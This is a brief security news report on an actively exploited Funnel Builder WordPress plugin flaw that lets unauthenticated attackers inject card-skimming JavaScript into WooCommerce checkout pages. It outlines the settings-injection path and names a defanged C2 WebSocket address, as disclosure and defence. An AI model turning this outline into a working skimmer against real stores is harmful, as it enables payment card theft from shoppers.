THE Hacker News reports a critical vulnerability in the Funnel Builder WordPress plugin that has moved into active exploitation to skim payments on WooCommerce checkout pages. The flaw allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page, enabling a skimmer to capture credit card numbers, CVVs, and billing addresses, with a patch released in version 3.15.0[.]3. It affects all versions prior to 3.15.0[.]3 and is used across more than 40,000 WooCommerce stores, according to Sansec.
Attackers are observed planting fake Google Tag Manager scripts in the plugin’s External Scripts setting, where the injected code masquerades as analytics while loading the malicious skimmer and opening a WebSocket connection to the attacker’s C2 server at wss://protect-wss[.]com/ws.
The vulnerability stems from Funnel Builder’s public checkout endpoint and permissive internal method handling, which could let an unauthenticated request write attacker-controlled data into the plugin’s global settings, enabling the universal injection on checkout pages.